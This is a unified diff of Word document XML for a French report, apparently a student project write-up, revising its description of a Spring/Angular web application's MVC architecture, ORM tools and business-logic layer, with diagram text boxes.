+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>L’utilisation d’o</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>utils pour l</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>es ORM (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>Hibernate</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>iBatis</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>, ...)]</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Angular</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, lui permet </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">d’écrire </w:t>
+      </w:r>
+      <w:r>
+        <w:t>des pages</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> SPA</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, ce qui évite</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t>à une base de données</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> relationnelle</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> MySQL</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> et déléguant l’affichage des pages </w:t>
-      </w:r>
-      <w:r>
-        <w:t>html à Angular (Frontend)</w:t>
+        <w:t>le rechargement de la page l</w:t>
+      </w:r>
+      <w:r>
+        <w:t>orsque l</w:t>
+      </w:r>
+      <w:r>
+        <w:t>es données sont mises à jour</w:t>
       </w:r>
       <w:r>
         <w:t>.</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="708"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251682816" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
-            <wp:simplePos x="0" y="0"/>
-            <wp:positionH relativeFrom="column">
-              <wp:posOffset>2186305</wp:posOffset>
-            </wp:positionH>
-            <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>56515</wp:posOffset>
-            </wp:positionV>
-            <wp:extent cx="1971675" cy="1325245"/>
-            <wp:effectExtent l="0" t="0" r="9525" b="8255"/>
-            <wp:wrapThrough wrapText="bothSides">
-              <wp:wrapPolygon edited="0">
-                <wp:start x="8974" y="0"/>
-                <wp:lineTo x="8974" y="7452"/>
-                <wp:lineTo x="11896" y="9936"/>
-                <wp:lineTo x="14817" y="9936"/>
-                <wp:lineTo x="0" y="12109"/>
-                <wp:lineTo x="0" y="20803"/>
-                <wp:lineTo x="417" y="21424"/>
-                <wp:lineTo x="3965" y="21424"/>
-                <wp:lineTo x="21496" y="21114"/>
-                <wp:lineTo x="21496" y="12730"/>
-                <wp:lineTo x="15861" y="9936"/>
-                <wp:lineTo x="21496" y="7762"/>
-                <wp:lineTo x="21496" y="0"/>
-                <wp:lineTo x="8974" y="0"/>
-              </wp:wrapPolygon>
-            </wp:wrapThrough>
-            <wp:docPr id="14" name="Image 14"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="14" name="backend&amp;frontend_architectureModif.png"/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId6" cstate="print">
-                      <a:extLst>
-                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-                        </a:ext>
-                      </a:extLst>
-                    </a:blip>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="1971675" cy="1325245"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-            <wp14:sizeRelH relativeFrom="page">
-              <wp14:pctWidth>0</wp14:pctWidth>
-            </wp14:sizeRelH>
-            <wp14:sizeRelV relativeFrom="page">
-              <wp14:pctHeight>0</wp14:pctHeight>
-            </wp14:sizeRelV>
-          </wp:anchor>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="708"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="708"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="708"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="708"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="708"/>
-      </w:pPr>
-    </w:p>
-    <w:p/>
+      <w:r>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="NormalWeb"/>
@@ -1400,10 +1716,15 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t>La seconde phase de conception consiste</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> à choisir comment organiser le code source. </w:t>
+        <w:t xml:space="preserve">Un projet </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Spring</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> est structuré selon l’approche</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1412,7 +1733,7 @@
           <w:szCs w:val="22"/>
           <w:lang w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t>Pour mon projet, j’ai utilisé l’architecture MVC</w:t>
+        <w:t xml:space="preserve"> MVC</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1421,8 +1742,9 @@
           <w:szCs w:val="22"/>
           <w:lang w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (Model – View – Controller)</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> (Model – </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
@@ -1430,8 +1752,9 @@
           <w:szCs w:val="22"/>
           <w:lang w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> qui présente l’avantage de découpler le développement du backend et du frontend</w:t>
-      </w:r>
+        <w:t>View</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
@@ -1439,7 +1762,34 @@
           <w:szCs w:val="22"/>
           <w:lang w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> et donc d’offrir plus de souplesse pour faire évoluer l’application </w:t>
+        <w:t xml:space="preserve"> – Controller)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> qui présente l’avantage de </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>découper le code source en domaine fonctionnel</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1610,13 +1960,8 @@
       <w:pPr>
         <w:ind w:left="360"/>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="360"/>
-      </w:pPr>
-      <w:r>
-        <w:t>&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt; schéma (p 304) &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;</w:t>
+      <w:r>
+        <w:t>MVC1 - oral</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1675,7 +2020,7 @@
           <w:szCs w:val="22"/>
           <w:lang w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t>serait l’intégration d’une couche intermédiaire</w:t>
+        <w:t>serait MVCL avec</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1684,7 +2029,7 @@
           <w:szCs w:val="22"/>
           <w:lang w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t>, la couche logique métier, venant s’insérer</w:t>
+        <w:t xml:space="preserve"> l’intégration d’une couche intermédiaire</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1693,7 +2038,7 @@
           <w:szCs w:val="22"/>
           <w:lang w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> entre le</w:t>
+        <w:t>, la couche logique métier, venant s’insérer</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1702,7 +2047,7 @@
           <w:szCs w:val="22"/>
           <w:lang w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t>s couches</w:t>
+        <w:t xml:space="preserve"> entre le</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1711,7 +2056,7 @@
           <w:szCs w:val="22"/>
           <w:lang w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> modèle </w:t>
+        <w:t>s couches</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1720,22 +2065,17 @@
           <w:szCs w:val="22"/>
           <w:lang w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t>et contrôleur.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        <w:spacing w:before="0" w:after="160"/>
-        <w:ind w:firstLine="708"/>
+        <w:t xml:space="preserve"> modèle </w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
           <w:lang w:eastAsia="en-US"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>et contrôleur.</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
@@ -1743,98 +2083,512 @@
           <w:szCs w:val="22"/>
           <w:lang w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t>Cette couche a pour rôle d’envoyer les requêtes SQL via un ORM</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> à la base de données</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> et </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">d’appliquer un traitement </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>en fonction de la réponse reçue en retour</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">La couche logique métier sera implémentée sous forme de services </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>et aura pour d’être appelée</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> depuis le contrôleur</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
+        <w:t xml:space="preserve"> Elle a pour rôle de délester le contrôleur de toute la gestion du traitement des requêtes SQL.</w:t>
+      </w:r>
+    </w:p>
     <w:p>
       <w:r>
         <w:rPr>
           <w:noProof/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251682816" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="728F2026" wp14:editId="77D15706">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>2447925</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>243840</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="781050" cy="466725"/>
+                <wp:effectExtent l="0" t="0" r="19050" b="28575"/>
+                <wp:wrapNone/>
+                <wp:docPr id="18" name="Zone de texte 18"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="781050" cy="466725"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:srgbClr val="000000"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                              <w:jc w:val="center"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>Logique métier</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shapetype w14:anchorId="728F2026" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
+                <v:stroke joinstyle="miter"/>
+                <v:path gradientshapeok="t" o:connecttype="rect"/>
+              </v:shapetype>
+              <v:shape id="Zone de texte 18" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:192.75pt;margin-top:19.2pt;width:61.5pt;height:36.75pt;z-index:251682816;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-width-relative:margin;v-text-anchor:top" o:gfxdata="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">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                        <w:jc w:val="center"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>Logique métier</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>3348355</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>237490</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="828675" cy="466725"/>
+                <wp:effectExtent l="0" t="0" r="28575" b="28575"/>
+                <wp:wrapNone/>
+                <wp:docPr id="2" name="Zone de texte 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="828675" cy="466725"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:srgbClr val="000000"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:jc w:val="center"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>Contrôleur</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape id="Zone de texte 2" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:263.65pt;margin-top:18.7pt;width:65.25pt;height:36.75pt;z-index:251669504;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-width-relative:margin;v-text-anchor:top" o:gfxdata="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">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:jc w:val="center"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>Contrôleur</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251670528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>1510030</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>237490</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="781050" cy="466725"/>
+                <wp:effectExtent l="0" t="0" r="19050" b="28575"/>
+                <wp:wrapNone/>
+                <wp:docPr id="3" name="Zone de texte 3"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="781050" cy="466725"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:srgbClr val="000000"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                              <w:jc w:val="center"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>Modèle</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape id="Zone de texte 3" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;margin-left:118.9pt;margin-top:18.7pt;width:61.5pt;height:36.75pt;z-index:251670528;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-width-relative:margin;v-text-anchor:top" o:gfxdata="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">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                        <w:jc w:val="center"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>Modèle</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251666430" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1F9A3421" wp14:editId="79CEA7E2">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="margin">
+                  <wp:posOffset>929005</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>280035</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="523875" cy="409575"/>
+                <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
+                <wp:wrapThrough wrapText="bothSides">
+                  <wp:wrapPolygon edited="0">
